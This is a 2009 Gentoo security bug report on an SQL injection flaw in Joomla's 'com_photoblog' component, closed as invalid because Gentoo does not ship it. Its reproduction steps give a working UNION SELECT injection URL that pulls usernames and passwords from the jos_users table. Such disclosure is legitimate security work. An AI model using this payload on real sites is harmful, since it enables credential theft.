Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 290982 - Joomla! 'com_photoblog' Component 'category' Parameter SQL Injection Vulnerability
Summary: Joomla! 'com_photoblog' Component 'category' Parameter SQL Injection Vulnerab...
Status: RESOLVED INVALID
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: High critical (vote)
Assignee: Gentoo Security
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2009-10-29 08:33 UTC by Dawoud
Modified: 2009-10-29 14:18 UTC (History)
0 users

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Dawoud 2009-10-29 08:33:58 UTC
http://www.securityfocus.com/bid/36809/info

The 'com_photoblog' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Reproducible: Always

Steps to Reproduce:
1. http://www.example.com/index.php?option=com_photoblog&view=blogs&category=-666/**/union/**/select/**/6,concat%280x3a,username,password%29,6,6,version%28%29,6,6,6,6,6,6,6,6,6/**/from/**/jos_users/*



Sorry again, the initial description isn't clear about version.
Comment 1 Tobias Heinlein (RETIRED) gentoo-dev 2009-10-29 14:18:51 UTC
We don't ship this component, i.e. www-apps/joomla doesn't contain it.